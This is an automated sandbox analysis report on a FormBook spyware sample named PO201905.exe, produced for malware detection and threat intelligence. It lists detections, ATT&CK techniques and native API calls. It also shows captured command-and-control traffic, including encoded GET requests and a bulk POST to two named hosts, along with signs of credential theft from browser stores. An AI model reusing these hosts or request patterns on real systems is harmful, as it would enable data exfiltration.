Loading ...

Play interactive tourEdit tour

Analysis Report PO201905.exe

Overview

General Information

Joe Sandbox Version:26.0.0 Aquamarine
Analysis ID:855421
Start date:06.05.2019
Start time:21:15:50
Joe Sandbox Product:Cloud
Overall analysis duration:0h 13m 56s
Hypervisor based Inspection enabled:false
Report type:full
Sample file name:PO201905.exe
Cookbook file name:default.jbs
Analysis system description:Windows 7 (Office 2016 v15, Java 1.8.71, Flash 20.0.0.286, Acrobat Reader 11.0.14, Internet Explorer 11, Chrome 48, Firefox 44)
Number of analysed new started processes analysed:12
Number of new started drivers analysed:0
Number of existing processes analysed:0
Number of existing drivers analysed:0
Number of injected processes analysed:1
Technologies
  • HCA enabled
  • EGA enabled
Analysis stop reason:Timeout
Detection:MAL
Classification:mal100.spyw.evad.winEXE@11/6@4/3
EGA Information:Failed
HCA Information:
  • Successful, ratio: 100%
  • Number of executed functions: 55
  • Number of non-executed functions: 73
Cookbook Comments:
  • Adjust boot time
  • Found application associated with file extension: .exe
Warnings:
Show All
  • Max analysis timeout: 600s exceeded, the analysis took too long
  • Exclude process from analysis (whitelisted): WatAdminSvc.exe, dllhost.exe, sppsvc.exe, conhost.exe, slui.exe, WmiPrvSE.exe
  • Report size getting too big, too many NtOpenKeyEx calls found.
  • Report size getting too big, too many NtQueryValueKey calls found.

Detection

StrategyScoreRangeReportingWhitelistedDetection
Threshold1000 - 100Report FP / FNfalsemalicious

Confidence

StrategyScoreRangeFurther Analysis Required?Confidence
Threshold50 - 5false
ConfidenceConfidence


Classification

Analysis Advice

Sample may offer command line options, please run it with the 'Execute binary with arguments' cookbook (it's possible that the command line switches require additional characters like: "-", "/", "--")
Sample tries to load a library which is not present or installed on the analysis machine, adding the library might reveal more behavior
Some HTTP requests failed (404). It is likely the sample will exhibit less behavior



Mitre Att&ck Matrix

Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and Control
Valid AccountsExploitation for Client Execution1Registry Run Keys / Startup Folder1Process Injection411Software Packing1Credentials in Files1Process Discovery1Application Deployment SoftwareData from Local System1Data CompressedStandard Cryptographic Protocol1
Replication Through Removable MediaService ExecutionPort MonitorsAccessibility FeaturesDisabling Security Tools1Network SniffingSecurity Software Discovery3Remote ServicesData from Removable MediaExfiltration Over Other Network MediumStandard Non-Application Layer Protocol4
Drive-by CompromiseWindows Management InstrumentationAccessibility FeaturesPath InterceptionProcess Injection411Input CaptureRemote System Discovery1Windows Remote ManagementData from Network Shared DriveAutomated ExfiltrationStandard Application Layer Protocol4
Exploit Public-Facing ApplicationScheduled TaskSystem FirmwareDLL Search Order HijackingObfuscated Files or Information3Credentials in FilesSystem Information Discovery2Logon ScriptsInput CaptureData EncryptedMultiband Communication

Signature Overview

Click to jump to signature section


AV Detection:

barindex
Antivirus or Machine Learning detection for dropped fileShow sources
Source: C:\Program Files\Fppxlgn\9rxlgd1bcduf.exeJoe Sandbox ML: detected
Source: C:\Program Files\Fppxlgn\9rxlgd1bcduf.exeJoe Sandbox ML: detected
Antivirus or Machine Learning detection for sampleShow sources
Source: PO201905.exeJoe Sandbox ML: detected
Multi AV Scanner detection for dropped fileShow sources
Source: C:\Program Files\Fppxlgn\9rxlgd1bcduf.exevirustotal: Detection: 16%Perma Link
Multi AV Scanner detection for submitted fileShow sources
Source: PO201905.exevirustotal: Detection: 16%Perma Link
Antivirus or Machine Learning detection for unpacked fileShow sources
Source: 12.1.9rxlgd1bcduf.exe.1060000.0.unpackJoe Sandbox ML: detected
Source: 0.1.PO201905.exe.fb0000.0.unpackJoe Sandbox ML: detected
Source: 12.0.9rxlgd1bcduf.exe.1060000.0.unpackJoe Sandbox ML: detected
Source: 0.2.PO201905.exe.fb0000.3.unpackJoe Sandbox ML: detected
Source: 0.0.PO201905.exe.fb0000.0.unpackJoe Sandbox ML: detected

Software Vulnerabilities:

barindex
Found inlined nop instructions (likely shell or obfuscated code)Show sources
Source: C:\Users\user\Desktop\PO201905.exeCode function: 4x nop then pop edi0_2_00FCEB6B
Source: C:\Users\user\Desktop\PO201905.exeCode function: 4x nop then pop edi0_2_00FC66C6

Networking:

barindex
HTTP GET or POST without a user agentShow sources
Source: global trafficHTTP traffic detected: GET /c917/?oHl4Lb5=nSCEaBLXfhTJ/xBIM1eG5VjHdYjSCo5E7UcE1As1Jcfg6SQ1mrA8W1jO4t4mCZy3/NbUbQ==&uFF4=XROl_rtXM HTTP/1.1Host: www.shakeitmiami.comConnection: closeData Raw: 00 00 00 00 00 00 Data Ascii:
Source: global trafficHTTP traffic detected: GET /c917/?oHl4Lb5=iGVqKJabq6qQQGosgk35PP7J8LpIY7g2/xqRC4FpH3ix1hS6w0nKWvUQXf0Fn5J++7YKhg==&uFF4=XROl_rtXM&sql=1 HTTP/1.1Host: www.dazhen.ltdConnection: closeData Raw: 00 00 00 00 00 00 Data Ascii:
IP address seen in connection with other malwareShow sources
Source: Joe Sandbox ViewIP Address: 208.91.197.91 208.91.197.91
Source: Joe Sandbox ViewIP Address: 208.91.197.91 208.91.197.91
Internet Provider seen in connection with other malwareShow sources
Source: Joe Sandbox ViewASN Name: unknown unknown
Downloads files from webservers via HTTPShow sources
Source: global trafficHTTP traffic detected: GET /c917/?oHl4Lb5=nSCEaBLXfhTJ/xBIM1eG5VjHdYjSCo5E7UcE1As1Jcfg6SQ1mrA8W1jO4t4mCZy3/NbUbQ==&uFF4=XROl_rtXM HTTP/1.1Host: www.shakeitmiami.comConnection: closeData Raw: 00 00 00 00 00 00 Data Ascii:
Source: global trafficHTTP traffic detected: GET /c917/?oHl4Lb5=iGVqKJabq6qQQGosgk35PP7J8LpIY7g2/xqRC4FpH3ix1hS6w0nKWvUQXf0Fn5J++7YKhg==&uFF4=XROl_rtXM&sql=1 HTTP/1.1Host: www.dazhen.ltdConnection: closeData Raw: 00 00 00 00 00 00 Data Ascii:
Performs DNS lookupsShow sources
Source: unknownDNS traffic detected: queries for: www.shakeitmiami.com
Posts data to webserverShow sources
Source: unknownHTTP traffic detected: POST /c917/ HTTP/1.1Host: www.dazhen.ltdConnection: closeContent-Length: 104865Cache-Control: no-cacheOrigin: http://www.dazhen.ltdUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.dazhen.ltd/c917/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 6f 48 6c 34 4c 62 35 3d 71 6b 5a 51 55 73 58 75 79 5a 79 66 42 69 5a 33 77 55 69 6d 56 4a 58 5a 39 71 64 4c 59 34 6f 56 6f 55 54 69 50 70 70 63 54 47 79 51 28 42 47 54 6e 6b 48 66 44 64 6f 64 4a 6f 41 68 69 75 63 4d 7a 6f 41 74 37 64 65 55 50 6c 35 75 50 45 4c 4f 30 50 4c 6c 63 78 66 73 46 61 47 4b 6f 47 35 43 6c 33 45 47 42 6e 31 53 43 6e 79 59 59 35 41 66 49 74 33 58 54 4d 71 46 4c 43 4c 54 54 38 44 79 56 78 7e 65 71 45 70 6e 6b 71 4f 73 75 41 47 79 49 76 62 55 4a 48 4a 45 77 6f 7e 48 44 46 44 57 6f 6d 7e 4a 48 44 28 5f 6b 32 72 52 37 50 55 38 31 71 54 44 77 38 42 4c 7a 69 6f 55 44 72 74 74 48 46 78 5f 4c 68 51 58 59 78 64 44 53 54
Tries to download or post to a non-existing http route (HTTP/1.1 404 Not Found / 503 Service Unavailable)Show sources
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: TengineContent-Type: text/html; charset=utf-8Content-Length: 1864Connection: closeDate: Mon, 06 May 2019 19:25:56 GMTVary: Accept-EncodingCache-Control: privateSet-Cookie: ASP.NET_SessionId=cvf30oid01f3tnzktbph5mu3; path=/; HttpOnlyX-AspNet-Version: 4.0.30319X-Powered-By: ASP.NETAli-Swift-Global-Savetime: 1557170756Via: cache24.l2hk71[24,404-1280,M], cache1.l2hk71[25,0], cache18.ru3[701,404-1280,M], cache6.ru3[895,0]X-Swift-Error: orig response 4XX errorX-Cache: MISS TCP_MISS dirn:-2:-2X-Swift-SaveTime: Mon, 06 May 2019 19:25:57 GMTX-Swift-CacheTime: 0X-Swift-Error: orig response 4XX errorTiming-Allow-Origin: *EagleId: 2ff6029a15571707562454862eData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 27 75 74 66 2d 38 27 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 76 69 65 77 70 6f 72 74 27 20 63 6f 6e 74 65 6e 74 3d 27 77 6
Urls found in memory or binary dataShow sources
Source: explorer.exe, 00000006.00000000.4490786039.05A85000.00000004.sdmpString found in binary or memory: http://go.
Source: explorer.exe, 00000006.00000000.4489219800.04C00000.00000008.sdmpString found in binary or memory: http://wellformedweb.org/CommentAPI/
Source: explorer.exe, 00000006.00000000.4496745744.01F30000.00000008.sdmpString found in binary or memory: http://www.%s.comPA
Source: explorer.exe, 00000006.00000000.4495461915.0037D000.00000004.sdmpString found in binary or memory: http://www.autoitscript.com/autoit3/J
Source: explorer.exe, 00000006.00000000.4489403773.04E37000.00000004.sdmpString found in binary or memory: http://www.autoitscript.com/favicon.ico
Source: explorer.exe, 00000006.00000000.4489403773.04E37000.00000004.sdmpString found in binary or memory: http://www.autoitscript.com/site/autoit/

System Summary:

barindex
FormBook malware detectedShow sources
Source: C:\Windows\System32\ipconfig.exeDropped file: C:\Users\user\AppData\Roaming\KM3N36B6\KM3logri.iniJump to dropped file
Source: C:\Windows\System32\ipconfig.exeDropped file: C:\Users\user\AppData\Roaming\KM3N36B6\KM3logrv.iniJump to dropped file
Source: C:\Program Files\Mozilla Firefox\firefox.exeDropped file: C:\Users\user\AppData\Roaming\KM3N36B6\KM3logrf.iniJump to dropped file
Abnormal high CPU UsageShow sources
Source: C:\Users\user\Desktop\PO201905.exeProcess Stats: CPU usage > 98%
Contains functionality to call native functionsShow sources
Source: C:\Users\user\Desktop\PO201905.exeCode function: 0_2_00FD18A8 NtAllocateVirtualMemory,0_2_00FD18A8
Source: C:\Users\user\Desktop\PO201905.exeCode function: 0_2_00FD16C8 NtCreateFile,0_2_00FD16C8
Source: C:\Users\user\Desktop\PO201905.exeCode function: 0_2_00FD17F8 NtClose,0_2_00FD17F8
Source: C:\Users\user\Desktop\PO201905.exeCode function: 0_2_00FD1778 NtReadFile,0_2_00FD1778
Source: C:\Users\user\Desktop\PO201905.exeCode function: 0_2_00FD18A2 NtAllocateVirtualMemory,0_2_00FD18A2
Source: C:\Users\user\Desktop\PO201905.exeCode function: 0_2_00FD16C2 NtCreateFile,0_2_00FD16C2
Source: C:\Users\user\Desktop\PO201905.exeCode function: 0_2_00FD171A NtReadFile,0_2_00FD171A
Source: C:\Users\user\Desktop\PO201905.exeCode function: 0_2_026062E0 NtQuerySystemInformation,NtQuerySystemInformation,0_2_026062E0
Source: C:\Users\user\Desktop\PO201905.exeCode function: 0_2_02606360 NtQueueApcThread,NtQueueApcThread,0_2_02606360
Source: C:\Users\user\Desktop\PO201905.exeCode function: 0_2_02605350 NtAdjustPrivilegesToken,NtAdjustPrivilegesToken,0_2_02605350
Source: C:\Users\user\Desktop\PO201905.exeCode function: 0_2_026063E0 NtReadVirtualMemory,NtReadVirtualMemory,0_2_026063E0
Source: C:\Users\user\Desktop\PO201905.exeCode function: 0_2_026053C0 NtAllocateVirtualMemory,NtAllocateVirtualMemory,0_2_026053C0
Source: C:\Users\user\Desktop\PO201905.exeCode function: 0_2_026063A0 NtReadFile,NtReadFile,0_2_026063A0
Source: C:\Users\user\Desktop\PO201905.exeCode function: 0_2_02606130 NtQueryInformationProcess,NtQueryInformationProcess,0_2_02606130
Source: C:\Users\user\Desktop\PO201905.exeCode function: 0_2_02606650 NtSetContextThread,NtSetContextThread,0_2_02606650
Source: C:\Users\user\Desktop\PO201905.exeCode function: 0_2_026056B0 NtCreateFile,NtCreateFile,0_2_026056B0
Source: C:\Users\user\Desktop\PO201905.exeCode function: 0_2_026057D0 NtCreateSection,NtCreateSection,0_2_026057D0
Source: C:\Users\user\Desktop\PO201905.exeCode function: 0_2_026055B0 NtClose,NtClose,0_2_026055B0
Source: C:\Users\user\Desktop\PO201905.exeCode function: 0_2_02606590 NtResumeThread,NtResumeThread,0_2_02606590
Source: C:\Users\user\Desktop\PO201905.exeCode function: 0_2_02605AC0 NtFreeVirtualMemory,0_2_02605AC0
Source: C:\Users\user\Desktop\PO201905.exeCode function: 0_2_026058B0 NtDelayExecution,NtDelayExecution,0_2_026058B0
Source: C:\Users\user\Desktop\PO201905.exeCode function: 0_2_02606980 NtSuspendThread,NtSuspendThread,0_2_02606980
Source: C:\Users\user\Desktop\PO201905.exeCode function: 0_2_02605D10 NtMapViewOfSection,NtMapViewOfSection,0_2_02605D10
Source: C:\Users\user\Desktop\PO201905.exeCode function: 0_2_02606270 NtQuerySection,0_2_02606270
Source: C:\Users\user\Desktop\PO201905.exeCode function: 0_2_02606340 NtQueryVirtualMemory,0_2_02606340
Source: C:\Users\user\Desktop\PO201905.exeCode function: 0_2_02606330 NtQueryValueKey,0_2_02606330
Source: C:\Users\user\Desktop\PO201905.exeCode function: 0_2_02606000 NtProtectVirtualMemory,0_2_02606000
Source: C:\Users\user\Desktop\PO201905.exeCode function: 0_2_02606160 NtQueryInformationToken,0_2_02606160
Source: C:\Users\user\Desktop\PO201905.exeCode function: 0_2_02606100 NtQueryInformationFile,0_2_02606100
Source: C:\Users\user\Desktop\PO201905.exeCode function: 0_2_026056F0 NtCreateKey,0_2_026056F0
Source: C:\Users\user\Desktop\PO201905.exeCode function: 0_2_02606720 NtSetInformationFile,0_2_02606720
Source: C:\Users\user\Desktop\PO201905.exeCode function: 0_2_02605730 NtCreateMutant,0_2_02605730
Source: C:\Users\user\Desktop\PO201905.exeCode function: 0_2_02605790 NtCreateProcessEx,0_2_02605790
Source: C:\Users\user\Desktop\PO201905.exeCode function: 0_2_02605A00 NtEnumerateValueKey,0_2_02605A00
Source: C:\Users\user\Desktop\PO201905.exeCode function: 0_2_02606AA0 NtUnmapViewOfSection,0_2_02606AA0
Source: C:\Users\user\Desktop\PO201905.exeCode function: 0_2_02606B50 NtWriteFile,0_2_02606B50
Source: C:\Users\user\Desktop\PO201905.exeCode function: 0_2_02606B00 NtWaitForSingleObject,0_2_02606B00
Source: C:\Users\user\Desktop\PO201905.exeCode function: 0_2_02605B00 NtGetContextThread,0_2_02605B00
Source: C:\Users\user\Desktop\PO201905.exeCode function: 0_2_02606B80 NtWriteVirtualMemory,0_2_02606B80
Source: C:\Users\user\Desktop\PO201905.exeCode function: 0_2_026068F0 NtSetValueKey,0_2_026068F0
Detected potential crypto functionShow sources
Source: C:\Users\user\Desktop\PO201905.exeCode function: 0_2_00FD48FE0_2_00FD48FE
Source: C:\Users\user\Desktop\PO201905.exeCode function: 0_2_00FC24680_2_00FC2468
Source: C:\Users\user\Desktop\PO201905.exeCode function: 0_2_00FC24630_2_00FC2463
Source: C:\Users\user\Desktop\PO201905.exeCode function: 0_2_00FC24220_2_00FC2422
Source: C:\Users\user\Desktop\PO201905.exeCode function: 0_2_00FD5D7E0_2_00FD5D7E
Source: C:\Users\user\Desktop\PO201905.exeCode function: 0_2_00FD56030_2_00FD5603
Source: C:\Users\user\Desktop\PO201905.exeCode function: 0_2_00FD4F870_2_00FD4F87
Source: C:\Users\user\Desktop\PO201905.exeCode function: 0_2_026302610_2_02630261
Source: C:\Users\user\Desktop\PO201905.exeCode function: 0_2_026162580_2_02616258
Source: C:\Users\user\Desktop\PO201905.exeCode function: 0_2_026342210_2_02634221
Source: C:\Users\user\Desktop\PO201905.exeCode function: 0_2_025E92030_2_025E9203
Source: C:\Users\user\Desktop\PO201905.exeCode function: 0_2_026303010_2_02630301
Source: C:\Users\user\Desktop\PO201905.exeCode function: 0_2_025C83DB0_2_025C83DB
Source: C:\Users\user\Desktop\PO201905.exeCode function: 0_2_025C70680_2_025C7068
Source: C:\Users\user\Desktop\PO201905.exeCode function: 0_2_0268603E0_2_0268603E
Source: C:\Users\user\Desktop\PO201905.exeCode function: 0_2_026260ED0_2_026260ED
Source: C:\Users\user\Desktop\PO201905.exeCode function: 0_2_025E30C90_2_025E30C9
Source: C:\Users\user\Desktop\PO201905.exeCode function: 0_2_025EE0BC0_2_025EE0BC
Source: C:\Users\user\Desktop\PO201905.exeCode function: 0_2_0266E1390_2_0266E139
Source: C:\Users\user\Desktop\PO201905.exeCode function: 0_2_025D96790_2_025D9679
Source: C:\Users\user\Desktop\PO201905.exeCode function: 0_2_026907E80_2_026907E8
Source: C:\Users\user\Desktop\PO201905.exeCode function: 0_2_025EC4470_2_025EC447
Source: C:\Users\user\Desktop\PO201905.exeCode function: 0_2_0261842B0_2_0261842B
Source: C:\Users\user\Desktop\PO201905.exeCode function: 0_2_0268B4CF0_2_0268B4CF
Source: C:\Users\user\Desktop\PO201905.exeCode function: 0_2_025C44E80_2_025C44E8
Source: C:\Users\user\Desktop\PO201905.exeCode function: 0_2_0268548D0_2_0268548D
Source: C:\Users\user\Desktop\PO201905.exeCode function: 0_2_026174950_2_02617495
Source: C:\Users\user\Desktop\PO201905.exeCode function: 0_2_025EE5BF0_2_025EE5BF
Source: C:\Users\user\Desktop\PO201905.exeCode function: 0_2_0261BA1C0_2_0261BA1C
Source: C:\Users\user\Desktop\PO201905.exeCode function: 0_2_025CCB670_2_025CCB67
Source: C:\Users\user\Desktop\PO201905.exeCode function: 0_2_025F3B0A0_2_025F3B0A
Source: C:\Users\user\Desktop\PO201905.exeCode function: 0_2_025E0BBB0_2_025E0BBB
Source: C:\Users\user\Desktop\PO201905.exeCode function: 0_2_026868E80_2_026868E8
Source: C:\Users\user\Desktop\PO201905.exeCode function: 0_2_026168DA0_2_026168DA
Source: C:\Users\user\Desktop\PO201905.exeCode function: 0_2_025E39440_2_025E3944
Source: C:\Users\user\Desktop\PO201905.exeCode function: 0_2_0262291F0_2_0262291F
Found potential string decryption / allocating functionsShow sources
Source: C:\Users\user\Desktop\PO201905.exeCode function: String function: 025DF5FB appears 179 times
Source: C:\Users\user\Desktop\PO201905.exeCode function: String function: 0265FD8A appears 46 times
Source: C:\Users\user\Desktop\PO201905.exeCode function: String function: 025E1A8E appears 82 times
Source: C:\Users\user\Desktop\PO201905.exeCode function: String function: 02612CAC appears 53 times
PE file contains strange resourcesShow sources
Source: PO201905.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 9rxlgd1bcduf.exe.6.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 9rxlgd1bcduf.exe0.6.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Reads the hosts fileShow sources
Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Windows\System32\ipconfig.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Sample file is different than original file name gathered from version infoShow sources
Source: PO201905.exe, 00000000.00000003.4481491679.00D81000.00000004.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs PO201905.exe
Source: PO201905.exe, 00000000.00000002.4518101641.00200000.00000008.sdmpBinary or memory string: OriginalFilenameMSCTF.DLL.MUIj% vs PO201905.exe
Source: PO201905.exe, 00000000.00000002.4518066485.000F0000.00000008.sdmpBinary or memory string: OriginalFilenameuser32j% vs PO201905.exe
Source: PO201905.exe, 00000000.00000003.4508449289.00256000.00000004.sdmpBinary or memory string: OriginalFilenameipconfig.exej% vs PO201905.exe
Tries to load missing DLLsShow sources
Source: C:\Windows\System32\ipconfig.exeSection loaded: mozglue.dllJump to behavior
Source: C:\Windows\System32\ipconfig.exeSection loaded: winsqlite3.dllJump to behavior
Yara signature matchShow sources
Source: PO201905.exe, type: SAMPLEMatched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 00000006.00000000.4489812531.05280000.00000002.sdmp, type: MEMORYMatched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 00000006.00000000.4489859117.053A0000.00000008.sdmp, type: MEMORYMatched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 0000000C.00000000.4605949292.01060000.00000002.sdmp, type: MEMORYMatched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 00000006.00000000.4499027121.02FD0000.00000008.sdmp, type: MEMORYMatched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 00000006.00000000.4499136614.03160000.00000008.sdmp, type: MEMORYMatched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 0000000C.00000001.4606191992.01060000.00000002.sdmp, type: MEMORYMatched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 00000006.00000000.4483829349.021F0000.00000008.sdmp, type: MEMORYMatched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 00000006.00000000.4489594683.04FD0000.00000002.sdmp, type: MEMORYMatched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 00000006.00000000.4483813760.021E0000.00000008.sdmp, type: MEMORYMatched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 00000006.00000000.4481973939.000D0000.00000008.sdmp, type: MEMORYMatched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 00000006.00000000.4483543065.01C90000.00000008.sdmp, type: MEMORYMatched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 00000006.00000000.4489196294.04B80000.00000008.sdmp, type: MEMORYMatched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 00000006.00000000.4482978785.00960000.00000008.sdmp, type: MEMORYMatched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 00000006.00000000.4485301200.02FD0000.00000008.sdmp, type: MEMORYMatched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 00000006.00000000.4485257832.02F00000.00000008.sdmp, type: MEMORYMatched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 00000000.00000002.4520123297.025C0000.00000040.sdmp, type: MEMORYMatched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 00000000.00000002.4518783364.00FBA000.00000040.sdmp, type: MEMORYMatched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 00000006.00000000.4483012656.009B0000.00000008.sdmp, type: MEMORYMatched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 00000006.00000000.4496745744.01F30000.00000008.sdmp, type: MEMORYMatched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 00000000.00000002.4518101641.00200000.00000008.sdmp, type: MEMORYMatched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 00000006.00000000.4496645451.01C90000.00000008.sdmp, type: MEMORYMatched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 00000006.00000000.4485383734.03160000.00000008.sdmp, type: MEMORYMatched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 00000000.00000000.3459785508.00FB0000.00000002.sdmp, type: MEMORYMatched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 00000006.00000000.4485420844.03230000.00000008.sdmp, type: MEMORYMatched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 00000006.00000000.4495827412.00730000.00000008.sdmp, type: MEMORYMatched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 00000006.00000000.4489866128.053E0000.00000008.sdmp, type: MEMORYMatched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 00000000.00000002.4518759786.00FB0000.00000002.sdmp, type: MEMORYMatched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 00000006.00000000.4496873251.020D0000.00000008.sdmp, type: MEMORYMatched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 00000006.00000000.4489753137.051E0000.00000008.sdmp, type: MEMORYMatched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 00000006.00000000.4489219800.04C00000.00000008.sdmp, type: MEMORYMatched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 00000006.00000000.4498956019.02F00000.00000008.sdmp, type: MEMORYMatched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 00000006.00000000.4495226765.000D0000.00000008.sdmp, type: MEMORYMatched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 00000006.00000000.4483619954.01F30000.00000008.sdmp, type: MEMORYMatched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 00000006.00000000.4498910122.02E40000.00000008.sdmp, type: MEMORYMatched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 0000000C.00000002.4699103178.000E0000.00000008.sdmp, type: MEMORYMatched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 00000000.00000003.4480049922.00B60000.00000004.sdmp, type: MEMORYMatched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 00000006.00000000.4489600354.04FE0000.00000008.sdmp, type: MEMORYMatched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 00000006.00000000.4498921613.02E50000.00000008.sdmp, type: MEMORYMatched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 00000006.00000000.4489914928.05460000.00000008.sdmp, type: MEMORYMatched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 00000006.00000000.4482006795.00120000.00000008.sdmp, type: MEMORYMatched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 00000000.00000002.4518066485.000F0000.00000008.sdmp, type: MEMORYMatched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 00000006.00000000.4496065227.00960000.00000008.sdmp, type: MEMORYMatched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 00000000.00000001.3460208049.00FB0000.00000002.sdmp, type: MEMORYMatched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
